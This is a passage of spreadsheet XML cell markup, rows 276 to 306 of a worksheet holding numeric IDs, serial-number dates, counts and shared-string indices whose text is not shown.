      <c r="K276" s="3" t="s">
        <v>60</v>
      </c>
      <c r="L276" s="4">
        <v>4</v>
      </c>
      <c r="M276" s="4">
        <v>2</v>
      </c>
      <c r="N276" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O276" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P276" s="3"/>
      <c r="Q276" s="3"/>
    </row>
    <row r="277" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A277" s="3">
        <v>139712</v>
      </c>
      <c r="B277" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C277" s="9" t="s">
        <v>2522</v>
      </c>
      <c r="D277" s="9" t="s">
        <v>2523</v>
      </c>
      <c r="E277" s="9">
        <v>981744</v>
      </c>
      <c r="F277" s="9" t="s">
        <v>2524</v>
      </c>
      <c r="G277" s="10">
        <v>41754.268055555556</v>
      </c>
      <c r="H277" s="9">
        <v>3200850</v>
      </c>
      <c r="I277" s="9" t="s">
        <v>2525</v>
      </c>
      <c r="J277" s="10">
        <v>41754.268055555556</v>
      </c>
      <c r="K277" s="3" t="s">
        <v>62</v>
      </c>
      <c r="L277" s="4">
        <v>5</v>
      </c>
      <c r="M277" s="4">
        <v>3</v>
      </c>
      <c r="N277" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O277" s="3" t="s">
        <v>702</v>
      </c>
      <c r="P277" s="3" t="s">
        <v>698</v>
      </c>
      <c r="Q277" s="3"/>
    </row>
    <row r="278" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A278" s="3">
        <v>140749</v>
      </c>
      <c r="B278" s="3" t="s">
        <v>89</v>
      </c>
      <c r="C278" s="9" t="s">
        <v>2526</v>
      </c>
      <c r="D278" s="9" t="s">
        <v>2527</v>
      </c>
      <c r="E278" s="9">
        <v>8188846</v>
      </c>
      <c r="F278" s="9" t="s">
        <v>2528</v>
      </c>
      <c r="G278" s="10">
        <v>43361.854166666664</v>
      </c>
      <c r="H278" s="9">
        <v>265140</v>
      </c>
      <c r="I278" s="9" t="s">
        <v>2529</v>
      </c>
      <c r="J278" s="10">
        <v>43200.37222222222</v>
      </c>
      <c r="K278" s="3" t="s">
        <v>90</v>
      </c>
      <c r="L278" s="4">
        <v>3</v>
      </c>
      <c r="M278" s="4">
        <v>1</v>
      </c>
      <c r="N278" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O278" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P278" s="3"/>
      <c r="Q278" s="3"/>
    </row>
    <row r="279" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A279" s="3">
        <v>140861</v>
      </c>
      <c r="B279" s="3" t="s">
        <v>91</v>
      </c>
      <c r="C279" s="9" t="s">
        <v>2530</v>
      </c>
      <c r="D279" s="9" t="s">
        <v>2531</v>
      </c>
      <c r="E279" s="9">
        <v>3093</v>
      </c>
      <c r="F279" s="9" t="s">
        <v>2532</v>
      </c>
      <c r="G279" s="10">
        <v>43463.695833333331</v>
      </c>
      <c r="H279" s="9">
        <v>177728</v>
      </c>
      <c r="I279" s="9" t="s">
        <v>2533</v>
      </c>
      <c r="J279" s="10">
        <v>43458.772916666669</v>
      </c>
      <c r="K279" s="3" t="s">
        <v>92</v>
      </c>
      <c r="L279" s="4">
        <v>4</v>
      </c>
      <c r="M279" s="4">
        <v>2</v>
      </c>
      <c r="N279" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O279" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P279" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q279" s="3"/>
    </row>
    <row r="280" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A280" s="3">
        <v>141114</v>
      </c>
      <c r="B280" s="3" t="s">
        <v>93</v>
      </c>
      <c r="C280" s="9" t="s">
        <v>2534</v>
      </c>
      <c r="D280" s="9" t="s">
        <v>2535</v>
      </c>
      <c r="E280" s="9">
        <v>117259</v>
      </c>
      <c r="F280" s="9" t="s">
        <v>2536</v>
      </c>
      <c r="G280" s="10">
        <v>41774.808333333334</v>
      </c>
      <c r="H280" s="9">
        <v>1146033</v>
      </c>
      <c r="I280" s="9" t="s">
        <v>2537</v>
      </c>
      <c r="J280" s="10">
        <v>41774.808333333334</v>
      </c>
      <c r="K280" s="3" t="s">
        <v>94</v>
      </c>
      <c r="L280" s="4">
        <v>4</v>
      </c>
      <c r="M280" s="4">
        <v>2</v>
      </c>
      <c r="N280" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O280" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P280" s="3" t="s">
        <v>704</v>
      </c>
      <c r="Q280" s="3"/>
    </row>
    <row r="281" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A281" s="3">
        <v>141132</v>
      </c>
      <c r="B281" s="3" t="s">
        <v>95</v>
      </c>
      <c r="C281" s="9" t="s">
        <v>2538</v>
      </c>
      <c r="D281" s="9" t="s">
        <v>2539</v>
      </c>
      <c r="E281" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F281" s="9" t="s">
        <v>2540</v>
      </c>
      <c r="G281" s="10">
        <v>43640.46597222222</v>
      </c>
      <c r="H281" s="9">
        <v>7869744</v>
      </c>
      <c r="I281" s="9" t="s">
        <v>2541</v>
      </c>
      <c r="J281" s="10">
        <v>43631.856944444444</v>
      </c>
      <c r="K281" s="3" t="s">
        <v>96</v>
      </c>
      <c r="L281" s="4">
        <v>5</v>
      </c>
      <c r="M281" s="4">
        <v>3</v>
      </c>
      <c r="N281" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O281" s="3" t="s">
        <v>702</v>
      </c>
      <c r="P281" s="3"/>
      <c r="Q281" s="3"/>
    </row>
    <row r="282" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A282" s="9">
        <v>141288</v>
      </c>
      <c r="B282" s="9" t="s">
        <v>1102</v>
      </c>
      <c r="C282" s="9" t="s">
        <v>2542</v>
      </c>
      <c r="D282" s="9" t="s">
        <v>2543</v>
      </c>
      <c r="E282" s="9">
        <v>14569</v>
      </c>
      <c r="F282" s="9" t="s">
        <v>2544</v>
      </c>
      <c r="G282" s="10">
        <v>39729.843055555553</v>
      </c>
      <c r="H282" s="9">
        <v>14569</v>
      </c>
      <c r="I282" s="9" t="s">
        <v>2544</v>
      </c>
      <c r="J282" s="10">
        <v>39729.842361111114</v>
      </c>
      <c r="K282" s="9" t="s">
        <v>1103</v>
      </c>
      <c r="L282" s="7">
        <v>3</v>
      </c>
      <c r="M282" s="7">
        <v>1</v>
      </c>
      <c r="N282" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="283" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A283" s="9">
        <v>141562</v>
      </c>
      <c r="B283" s="9" t="s">
        <v>1104</v>
      </c>
      <c r="C283" s="9" t="s">
        <v>2545</v>
      </c>
      <c r="D283" s="9" t="s">
        <v>2546</v>
      </c>
      <c r="E283" s="9">
        <v>3757</v>
      </c>
      <c r="F283" s="9" t="s">
        <v>2547</v>
      </c>
      <c r="G283" s="10">
        <v>43560.901388888888</v>
      </c>
      <c r="H283" s="9">
        <v>11029609</v>
      </c>
      <c r="I283" s="9" t="s">
        <v>2548</v>
      </c>
      <c r="J283" s="10">
        <v>43552.330555555556</v>
      </c>
      <c r="K283" s="9" t="s">
        <v>1105</v>
      </c>
      <c r="L283" s="7">
        <v>4</v>
      </c>
      <c r="M283" s="7">
        <v>2</v>
      </c>
      <c r="N283" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O283" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="284" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A284" s="3">
        <v>141700</v>
      </c>
      <c r="B284" s="3" t="s">
        <v>97</v>
      </c>
      <c r="C284" s="9" t="s">
        <v>2549</v>
      </c>
      <c r="D284" s="9" t="s">
        <v>2550</v>
      </c>
      <c r="E284" s="9">
        <v>1179</v>
      </c>
      <c r="F284" s="9" t="s">
        <v>2551</v>
      </c>
      <c r="G284" s="10">
        <v>39738.540277777778</v>
      </c>
      <c r="H284" s="9">
        <v>3560</v>
      </c>
      <c r="I284" s="9" t="s">
        <v>2046</v>
      </c>
      <c r="J284" s="10">
        <v>39717.848611111112</v>
      </c>
      <c r="K284" s="3" t="s">
        <v>98</v>
      </c>
      <c r="L284" s="4">
        <v>3</v>
      </c>
      <c r="M284" s="4">
        <v>1</v>
      </c>
      <c r="N284" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O284" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P284" s="3"/>
      <c r="Q284" s="3"/>
    </row>
    <row r="285" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A285" s="3">
        <v>142539</v>
      </c>
      <c r="B285" s="3" t="s">
        <v>109</v>
      </c>
      <c r="C285" s="9" t="s">
        <v>2552</v>
      </c>
      <c r="D285" s="9" t="s">
        <v>2553</v>
      </c>
      <c r="E285" s="9">
        <v>14065</v>
      </c>
      <c r="F285" s="9" t="s">
        <v>2554</v>
      </c>
      <c r="G285" s="10">
        <v>42803.6875</v>
      </c>
      <c r="H285" s="9">
        <v>7659995</v>
      </c>
      <c r="I285" s="9" t="s">
        <v>2555</v>
      </c>
      <c r="J285" s="10">
        <v>42803.140277777777</v>
      </c>
      <c r="K285" s="3" t="s">
        <v>110</v>
      </c>
      <c r="L285" s="4">
        <v>4</v>
      </c>
      <c r="M285" s="4">
        <v>2</v>
      </c>
      <c r="N285" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O285" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P285" s="3"/>
      <c r="Q285" s="3"/>
    </row>
    <row r="286" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A286" s="3">
        <v>143188</v>
      </c>
      <c r="B286" s="3" t="s">
        <v>111</v>
      </c>
      <c r="C286" s="9" t="s">
        <v>2556</v>
      </c>
      <c r="D286" s="9" t="s">
        <v>2557</v>
      </c>
      <c r="E286" s="9">
        <v>813</v>
      </c>
      <c r="F286" s="9" t="s">
        <v>2558</v>
      </c>
      <c r="G286" s="10">
        <v>39718.318749999999</v>
      </c>
      <c r="H286" s="9">
        <v>813</v>
      </c>
      <c r="I286" s="9" t="s">
        <v>2558</v>
      </c>
      <c r="J286" s="10">
        <v>39718.313888888886</v>
      </c>
      <c r="K286" s="3" t="s">
        <v>112</v>
      </c>
      <c r="L286" s="4">
        <v>2</v>
      </c>
      <c r="M286" s="4">
        <v>1</v>
      </c>
      <c r="N286" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O286" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P286" s="3"/>
      <c r="Q286" s="3"/>
    </row>
    <row r="287" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A287" s="3">
        <v>143671</v>
      </c>
      <c r="B287" s="3" t="s">
        <v>113</v>
      </c>
      <c r="C287" s="9" t="s">
        <v>2559</v>
      </c>
      <c r="D287" s="9" t="s">
        <v>2560</v>
      </c>
      <c r="E287" s="9">
        <v>4725</v>
      </c>
      <c r="F287" s="9" t="s">
        <v>2059</v>
      </c>
      <c r="G287" s="10">
        <v>42053.810416666667</v>
      </c>
      <c r="H287" s="9">
        <v>1754255</v>
      </c>
      <c r="I287" s="9" t="s">
        <v>2561</v>
      </c>
      <c r="J287" s="10">
        <v>42053.285416666666</v>
      </c>
      <c r="K287" s="3" t="s">
        <v>114</v>
      </c>
      <c r="L287" s="4">
        <v>3</v>
      </c>
      <c r="M287" s="4">
        <v>1</v>
      </c>
      <c r="N287" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O287" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P287" s="3"/>
      <c r="Q287" s="3"/>
    </row>
    <row r="288" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A288" s="3">
        <v>144673</v>
      </c>
      <c r="B288" s="5" t="s">
        <v>115</v>
      </c>
      <c r="C288" s="9" t="s">
        <v>2562</v>
      </c>
      <c r="D288" s="9" t="s">
        <v>2563</v>
      </c>
      <c r="E288" s="9">
        <v>9787</v>
      </c>
      <c r="F288" s="9" t="s">
        <v>2564</v>
      </c>
      <c r="G288" s="10">
        <v>39881.989583333336</v>
      </c>
      <c r="H288" s="9">
        <v>5640</v>
      </c>
      <c r="I288" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J288" s="10">
        <v>39878.216666666667</v>
      </c>
      <c r="K288" s="3" t="s">
        <v>116</v>
      </c>
      <c r="L288" s="4">
        <v>3</v>
      </c>
      <c r="M288" s="4">
        <v>1</v>
      </c>
      <c r="N288" s="3"/>
      <c r="O288" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P288" s="3"/>
      <c r="Q288" s="3" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="289" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A289" s="3">
        <v>144768</v>
      </c>
      <c r="B289" s="3" t="s">
        <v>117</v>
      </c>
      <c r="C289" s="9" t="s">
        <v>2565</v>
      </c>
      <c r="D289" s="9" t="s">
        <v>2566</v>
      </c>
      <c r="E289" s="9">
        <v>19679</v>
      </c>
      <c r="F289" s="9" t="s">
        <v>809</v>
      </c>
      <c r="G289" s="10">
        <v>41312.788888888892</v>
      </c>
      <c r="H289" s="9">
        <v>395659</v>
      </c>
      <c r="I289" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J289" s="10">
        <v>41312.443055555559</v>
      </c>
      <c r="K289" s="3" t="s">
        <v>118</v>
      </c>
      <c r="L289" s="4">
        <v>3</v>
      </c>
      <c r="M289" s="4">
        <v>1</v>
      </c>
      <c r="N289" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O289" s="3" t="s">
        <v>705</v>
      </c>
      <c r="P289" s="3" t="s">
        <v>699</v>
      </c>
      <c r="Q289" s="3"/>
    </row>
    <row r="290" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A290" s="3">
        <v>144791</v>
      </c>
      <c r="B290" s="3" t="s">
        <v>119</v>
      </c>
      <c r="C290" s="9" t="s">
        <v>2567</v>
      </c>
      <c r="D290" s="9" t="s">
        <v>2568</v>
      </c>
      <c r="E290" s="9">
        <v>1</v>
      </c>
      <c r="F290" s="9" t="s">
        <v>1865</v>
      </c>
      <c r="G290" s="10">
        <v>39719.620138888888</v>
      </c>
      <c r="H290" s="9">
        <v>1199</v>
      </c>
      <c r="I290" s="9" t="s">
        <v>2569</v>
      </c>
      <c r="J290" s="10">
        <v>39719.051388888889</v>
      </c>
      <c r="K290" s="3" t="s">
        <v>120</v>
      </c>
      <c r="L290" s="4">
        <v>3</v>
      </c>
      <c r="M290" s="4">
        <v>1</v>
      </c>
      <c r="N290" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O290" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P290" s="3"/>
      <c r="Q290" s="3"/>
    </row>
    <row r="291" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A291" s="3">
        <v>146304</v>
      </c>
      <c r="B291" s="3" t="s">
        <v>121</v>
      </c>
      <c r="C291" s="9" t="s">
        <v>2570</v>
      </c>
      <c r="D291" s="9" t="s">
        <v>2571</v>
      </c>
      <c r="E291" s="9">
        <v>23113</v>
      </c>
      <c r="F291" s="9" t="s">
        <v>2572</v>
      </c>
      <c r="G291" s="10">
        <v>40350.718055555553</v>
      </c>
      <c r="H291" s="9">
        <v>35690</v>
      </c>
      <c r="I291" s="9" t="s">
        <v>2573</v>
      </c>
      <c r="J291" s="10">
        <v>40348.043055555558</v>
      </c>
      <c r="K291" s="3" t="s">
        <v>122</v>
      </c>
      <c r="L291" s="4">
        <v>6</v>
      </c>
      <c r="M291" s="4">
        <v>3</v>
      </c>
      <c r="N291" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O291" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P291" s="3"/>
      <c r="Q291" s="3"/>
    </row>
    <row r="292" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A292" s="3">
        <v>146365</v>
      </c>
      <c r="B292" s="3" t="s">
        <v>123</v>
      </c>
      <c r="C292" s="9" t="s">
        <v>2574</v>
      </c>
      <c r="D292" s="9" t="s">
        <v>2575</v>
      </c>
      <c r="E292" s="9">
        <v>317849</v>
      </c>
      <c r="F292" s="9" t="s">
        <v>2576</v>
      </c>
      <c r="G292" s="10">
        <v>40901.065972222219</v>
      </c>
      <c r="H292" s="9">
        <v>893</v>
      </c>
      <c r="I292" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="J292" s="10">
        <v>40058.122916666667</v>
      </c>
      <c r="K292" s="3" t="s">
        <v>124</v>
      </c>
      <c r="L292" s="4">
        <v>3</v>
      </c>
      <c r="M292" s="4">
        <v>1</v>
      </c>
      <c r="N292" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O292" s="3"/>
      <c r="P292" s="3"/>
      <c r="Q292" s="3"/>
    </row>
    <row r="293" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A293" s="3">
        <v>147176</v>
      </c>
      <c r="B293" s="3" t="s">
        <v>183</v>
      </c>
      <c r="C293" s="9" t="s">
        <v>2577</v>
      </c>
      <c r="D293" s="9" t="s">
        <v>2578</v>
      </c>
      <c r="E293" s="9">
        <v>13</v>
      </c>
      <c r="F293" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G293" s="10">
        <v>42713.047222222223</v>
      </c>
      <c r="H293" s="9">
        <v>224132</v>
      </c>
      <c r="I293" s="9" t="s">
        <v>2579</v>
      </c>
      <c r="J293" s="10">
        <v>42710.977083333331</v>
      </c>
      <c r="K293" s="3" t="s">
        <v>184</v>
      </c>
      <c r="L293" s="4">
        <v>4</v>
      </c>
      <c r="M293" s="4">
        <v>2</v>
      </c>
      <c r="N293" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O293" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P293" s="3"/>
      <c r="Q293" s="3"/>
    </row>
    <row r="294" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A294" s="9">
        <v>147181</v>
      </c>
      <c r="B294" s="9" t="s">
        <v>1106</v>
      </c>
      <c r="C294" s="9" t="s">
        <v>2580</v>
      </c>
      <c r="D294" s="9" t="s">
        <v>2581</v>
      </c>
      <c r="E294" s="9">
        <v>5640</v>
      </c>
      <c r="F294" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="G294" s="10">
        <v>39720.084722222222</v>
      </c>
      <c r="H294" s="9">
        <v>4465</v>
      </c>
      <c r="I294" s="9" t="s">
        <v>2582</v>
      </c>
      <c r="J294" s="10">
        <v>39720.077777777777</v>
      </c>
      <c r="K294" s="9" t="s">
        <v>1107</v>
      </c>
      <c r="L294" s="7">
        <v>4</v>
      </c>
      <c r="M294" s="7">
        <v>2</v>
      </c>
      <c r="N294" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="295" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A295" s="9">
        <v>147391</v>
      </c>
      <c r="B295" s="9" t="s">
        <v>1108</v>
      </c>
      <c r="C295" s="9" t="s">
        <v>2583</v>
      </c>
      <c r="D295" s="9" t="s">
        <v>2584</v>
      </c>
      <c r="E295" s="9">
        <v>13</v>
      </c>
      <c r="F295" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G295" s="10">
        <v>39720.152777777781</v>
      </c>
      <c r="H295" s="9">
        <v>5963</v>
      </c>
      <c r="I295" s="9" t="s">
        <v>1878</v>
      </c>
      <c r="J295" s="10">
        <v>39720.148611111108</v>
      </c>
      <c r="K295" s="9" t="s">
        <v>1109</v>
      </c>
      <c r="L295" s="7">
        <v>4</v>
      </c>
      <c r="M295" s="7">
        <v>2</v>
      </c>
      <c r="N295" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O295" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="296" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A296" s="9">
        <v>148403</v>
      </c>
      <c r="B296" s="9" t="s">
        <v>1110</v>
      </c>
      <c r="C296" s="9" t="s">
        <v>2585</v>
      </c>
      <c r="D296" s="9" t="s">
        <v>2586</v>
      </c>
      <c r="E296" s="9">
        <v>22764</v>
      </c>
      <c r="F296" s="9" t="s">
        <v>2587</v>
      </c>
      <c r="G296" s="10">
        <v>43082.531944444447</v>
      </c>
      <c r="H296" s="9">
        <v>545127</v>
      </c>
      <c r="I296" s="9" t="s">
        <v>2588</v>
      </c>
      <c r="J296" s="10">
        <v>43081.940972222219</v>
      </c>
      <c r="K296" s="9" t="s">
        <v>1111</v>
      </c>
      <c r="L296" s="7">
        <v>10</v>
      </c>
      <c r="M296" s="7">
        <v>8</v>
      </c>
      <c r="N296" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="297" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A297" s="9">
        <v>149055</v>
      </c>
      <c r="B297" s="9" t="s">
        <v>1112</v>
      </c>
      <c r="C297" s="9" t="s">
        <v>2589</v>
      </c>
      <c r="D297" s="9" t="s">
        <v>2590</v>
      </c>
      <c r="E297" s="9">
        <v>3314</v>
      </c>
      <c r="F297" s="9" t="s">
        <v>2591</v>
      </c>
      <c r="G297" s="10">
        <v>41093.375</v>
      </c>
      <c r="H297" s="9">
        <v>50776</v>
      </c>
      <c r="I297" s="9" t="s">
        <v>1788</v>
      </c>
      <c r="J297" s="10">
        <v>40948.722222222219</v>
      </c>
      <c r="K297" s="9" t="s">
        <v>1113</v>
      </c>
      <c r="L297" s="7">
        <v>5</v>
      </c>
      <c r="M297" s="7">
        <v>3</v>
      </c>
      <c r="N297" s="9" t="s">
        <v>706</v>
      </c>
      <c r="Q297" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="298" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A298" s="9">
        <v>151472</v>
      </c>
      <c r="B298" s="9" t="s">
        <v>1114</v>
      </c>
      <c r="C298" s="9" t="s">
        <v>2592</v>
      </c>
      <c r="D298" s="9" t="s">
        <v>2593</v>
      </c>
      <c r="E298" s="9">
        <v>5302</v>
      </c>
      <c r="F298" s="9" t="s">
        <v>2164</v>
      </c>
      <c r="G298" s="10">
        <v>39721.40625</v>
      </c>
      <c r="H298" s="9">
        <v>5302</v>
      </c>
      <c r="I298" s="9" t="s">
        <v>2164</v>
      </c>
      <c r="J298" s="10">
        <v>39721.090277777781</v>
      </c>
      <c r="K298" s="9" t="s">
        <v>1115</v>
      </c>
      <c r="L298" s="7">
        <v>3</v>
      </c>
      <c r="M298" s="7">
        <v>1</v>
      </c>
      <c r="Q298" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="299" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A299" s="9">
        <v>151777</v>
      </c>
      <c r="B299" s="9" t="s">
        <v>1116</v>
      </c>
      <c r="C299" s="9" t="s">
        <v>2594</v>
      </c>
      <c r="D299" s="9" t="s">
        <v>2595</v>
      </c>
      <c r="E299" s="9">
        <v>426671</v>
      </c>
      <c r="F299" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G299" s="10">
        <v>42816.680555555555</v>
      </c>
      <c r="H299" s="9">
        <v>7275984</v>
      </c>
      <c r="I299" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J299" s="10">
        <v>42815.852777777778</v>
      </c>
      <c r="K299" s="9" t="s">
        <v>1117</v>
      </c>
      <c r="L299" s="7">
        <v>15</v>
      </c>
      <c r="M299" s="7">
        <v>13</v>
      </c>
      <c r="N299" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="300" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A300" s="9">
        <v>151974</v>
      </c>
      <c r="B300" s="9" t="s">
        <v>1118</v>
      </c>
      <c r="C300" s="9" t="s">
        <v>2596</v>
      </c>
      <c r="D300" s="9" t="s">
        <v>2597</v>
      </c>
      <c r="E300" s="9">
        <v>22076</v>
      </c>
      <c r="F300" s="9" t="s">
        <v>2598</v>
      </c>
      <c r="G300" s="10">
        <v>40098.455555555556</v>
      </c>
      <c r="H300" s="9">
        <v>63550</v>
      </c>
      <c r="I300" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J300" s="10">
        <v>40097.200694444444</v>
      </c>
      <c r="K300" s="9" t="s">
        <v>1119</v>
      </c>
      <c r="L300" s="7">
        <v>4</v>
      </c>
      <c r="M300" s="7">
        <v>2</v>
      </c>
      <c r="N300" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="301" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A301" s="3">
        <v>151976</v>
      </c>
      <c r="B301" s="3" t="s">
        <v>185</v>
      </c>
      <c r="C301" s="9" t="s">
        <v>2599</v>
      </c>
      <c r="D301" s="9" t="s">
        <v>2600</v>
      </c>
      <c r="E301" s="9">
        <v>1438393</v>
      </c>
      <c r="F301" s="9" t="s">
        <v>2601</v>
      </c>
      <c r="G301" s="10">
        <v>41663.65347222222</v>
      </c>
      <c r="H301" s="9">
        <v>1458648</v>
      </c>
      <c r="I301" s="9" t="s">
        <v>2602</v>
      </c>
      <c r="J301" s="10">
        <v>41580.496527777781</v>
      </c>
      <c r="K301" s="3" t="s">
        <v>186</v>
      </c>
      <c r="L301" s="4">
        <v>4</v>
      </c>
      <c r="M301" s="4">
        <v>2</v>
      </c>
      <c r="N301" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O301" s="3"/>
      <c r="P301" s="3"/>
      <c r="Q301" s="3"/>
    </row>
    <row r="302" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A302" s="3">
        <v>152284</v>
      </c>
      <c r="B302" s="3" t="s">
        <v>187</v>
      </c>
      <c r="C302" s="9" t="s">
        <v>2603</v>
      </c>
      <c r="D302" s="9" t="s">
        <v>2604</v>
      </c>
      <c r="E302" s="9">
        <v>5190</v>
      </c>
      <c r="F302" s="9" t="s">
        <v>2605</v>
      </c>
      <c r="G302" s="10">
        <v>39721.377083333333</v>
      </c>
      <c r="H302" s="9">
        <v>5190</v>
      </c>
      <c r="I302" s="9" t="s">
        <v>2605</v>
      </c>
      <c r="J302" s="10">
        <v>39721.372916666667</v>
      </c>
      <c r="K302" s="3" t="s">
        <v>188</v>
      </c>
      <c r="L302" s="4">
        <v>3</v>
      </c>
      <c r="M302" s="4">
        <v>2</v>
      </c>
      <c r="N302" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O302" s="3"/>
      <c r="P302" s="3"/>
      <c r="Q302" s="3"/>
    </row>
    <row r="303" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A303" s="3">
        <v>152863</v>
      </c>
      <c r="B303" s="3" t="s">
        <v>220</v>
      </c>
      <c r="C303" s="9" t="s">
        <v>2606</v>
      </c>
      <c r="D303" s="9" t="s">
        <v>2607</v>
      </c>
      <c r="E303" s="9">
        <v>1715673</v>
      </c>
      <c r="F303" s="9" t="s">
        <v>2608</v>
      </c>
      <c r="G303" s="10">
        <v>42169.411111111112</v>
      </c>
      <c r="H303" s="9">
        <v>877353</v>
      </c>
      <c r="I303" s="9" t="s">
        <v>2609</v>
      </c>
      <c r="J303" s="10">
        <v>42168.47152777778</v>
      </c>
      <c r="K303" s="3" t="s">
        <v>221</v>
      </c>
      <c r="L303" s="4">
        <v>17</v>
      </c>
      <c r="M303" s="4">
        <v>15</v>
      </c>
      <c r="N303" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O303" s="3"/>
      <c r="P303" s="3"/>
      <c r="Q303" s="3"/>
    </row>
    <row r="304" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A304" s="9">
        <v>153021</v>
      </c>
      <c r="B304" s="9" t="s">
        <v>1120</v>
      </c>
      <c r="C304" s="9" t="s">
        <v>2610</v>
      </c>
      <c r="D304" s="9" t="s">
        <v>2611</v>
      </c>
      <c r="E304" s="9">
        <v>5189</v>
      </c>
      <c r="F304" s="9" t="s">
        <v>2612</v>
      </c>
      <c r="G304" s="10">
        <v>39721.705555555556</v>
      </c>
      <c r="H304" s="9">
        <v>305</v>
      </c>
      <c r="I304" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="J304" s="10">
        <v>39721.597222222219</v>
      </c>
      <c r="K304" s="9" t="s">
        <v>1121</v>
      </c>
      <c r="L304" s="7">
        <v>4</v>
      </c>
      <c r="M304" s="7">
        <v>1</v>
      </c>
      <c r="N304" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O304" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="305" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A305" s="9">
        <v>153724</v>
      </c>
      <c r="B305" s="9" t="s">
        <v>1122</v>
      </c>
      <c r="C305" s="9" t="s">
        <v>2613</v>
      </c>
      <c r="D305" s="9" t="s">
        <v>2614</v>
      </c>
      <c r="E305" s="9">
        <v>426671</v>
      </c>
      <c r="F305" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G305" s="10">
        <v>42816.681944444441</v>
      </c>
      <c r="H305" s="9">
        <v>7275984</v>
      </c>
      <c r="I305" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J305" s="10">
        <v>42815.855555555558</v>
      </c>
      <c r="K305" s="9" t="s">
        <v>1123</v>
      </c>
      <c r="L305" s="7">
        <v>6</v>
      </c>
      <c r="M305" s="7">
        <v>4</v>
      </c>
      <c r="N305" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="306" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A306" s="3">
        <v>153785</v>
      </c>
      <c r="B306" s="3" t="s">
        <v>222</v>
      </c>
      <c r="C306" s="9" t="s">
        <v>2615</v>
      </c>
